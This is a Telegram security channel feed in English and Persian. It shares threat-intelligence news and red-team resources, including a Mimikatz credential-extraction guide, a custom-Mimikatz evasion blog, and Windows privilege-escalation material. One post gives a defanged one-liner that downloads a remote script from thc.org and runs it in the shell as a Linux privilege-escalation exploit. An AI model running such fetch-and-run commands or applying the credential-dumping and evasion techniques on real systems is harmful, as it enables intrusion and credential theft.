SoheilSec – Telegram
While tracking various state-sponsored APT groups, the Trend Zero Day Initiative Threat Hunting team discovered nearly 1,000 malicious .lnk files exploiting ZDI-CAN-25373. State-sponsored APT groups from North Korea, Iran, Russia, and China have been using ZDI-CAN-25373 for cyber espionage and data theft on a global scale.
https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html
👍1
Another year, another insightful Red Canary Threat Detection Report, and once again, it’s time to update the Red Canary Top Techniques Matrix to track the latest trends and shifts in adversary techniques. Spoiler: some things never change, but we’re seeing a few new wrinkles that highlight how threat actors are adapting.
https://app.tidalcyber.com/share/0bdd31ef-f241-4c51-a222-dc50419be7f8

https://redcanary.com/threat-detection-report/download-report/
نوروزتان خجسته باد! امیدوارم سالی سرشار از سلامتی، شادکامی و کامیابی پیش رو داشته باشید.
24🗿1
راهنمای_جامع_ابزار_Mimikatz_راهنمای_هکرها.pdf
4.4 MB
یکی از دوستان زحمت جمع آوری کامند کشیده من این pdf بررسی کردم نکات خوبی داره
پیشنهاد میکنم حتما بخونید برای خودتون یه md درست کنید تو پروژه به کار میاد در زمینه دور زدن بلاگ زیر میتونه بهتون دید بده
https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/

⭕️ | راهنمای جامع ابزار Mimikatz 

این کتاب به بررسی ابزار Mimikatz می‌پردازد که برای استخراج پسوردها، هش‌ها و توکن‌های دسترسی از حافظه سیستم استفاده می‌شود. در این کتاب، شما با تکنیک‌های پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامه‌ها، دور زدن مکانیزم‌های امنیتی و افزایش دسترسی. همچنین، نمونه‌هایی از حملات واقعی که از Mimikatz استفاده کرده‌اند و نحوه مقابله با این ابزار بررسی شده است.
6👍3👌1
6😈1
دیدم از افتا تشکر کردن بعد یک عمر یک گزارش داده ولی گویا افتا رول‌های کسپر دزدیده ریپلیس کرده اسم خودش گذاشته! خدایی اونجا یکتون بلد نیستید یارا رول بنویسه🤔
🗿23🆒6👍3👌2
این وبینار دیشب برگزار شد تکنیک‌های خیلی خاصی نگفت ولی به عنوان ردتیمر یا پنتستر باید اینارو بلد باشید. مخصوصا اگر IA از سیستم کلاینت باشه.
https://youtu.be/EG2Mbw2DVnU?si=_BRndxfQuvRodPjo
اسلایدهای ارائه:
https://www.slideshare.net/slideshow/windows-client-privilege-escalation-shared-pptx/277239036

اگر لب خواستید برای تست از ریپو میتونید کمک بگیرید براتون محیط اماده میکنه
https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook
3
🤔8😈1
اقای altman کاری کرد که شاید هیچ کدوم از سرویس‌های اطلاعاتی نتونن بکنن علاوه بر دانش یوزر اطلاعات در مورد کار محل کار چلنج روزانه و … حالا عکسشون هم داره زنده باد حریم شخصی 🤔
👍191👌1😈1
یک دوره باید بیان ایران یاد بگیرن چطوری تمیز کار در بیارن 🤔
https://www.bleepingcomputer.com/news/security/oracle-customers-confirm-data-stolen-in-alleged-cloud-breach-is-valid/
😈6🗿5
CVE-2025-0401: 7350pipe - Linux Privilege Escalation (all versions🤔). Exploit via a simple 1-liner: (defang: remove square brackets)
. <(curl -SsfL https://thc[.]org/7350pipe)
🆒13🗿9👍3😈1
You have got a valid NTLM relay but SMB and LDAP are signed, LDAPS has got Channel Binding and ESC8 is not available... What about WinRMS ?
Don't forget to patch your WinRMS' configurations if you enabled the default one!!
Blog:https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Tool:https://github.com/fortra/impacket/pull/1947
🆒2
🗿71👍1
At this week’s Microsoft BlueHat IL conference, Benjamin Delpy - widely respected for his work with Mimikatz - delivered what appears to be the first industry leak of Mimikatz 3.0.0 in a live demo. For those of us who have used Mimikatz extensively, this update is particularly intriguing. Delpy made it clear from the outset that this version won’t be publicly released anytime soon - a move that suggests significant shifts ahead.
🤔6👍2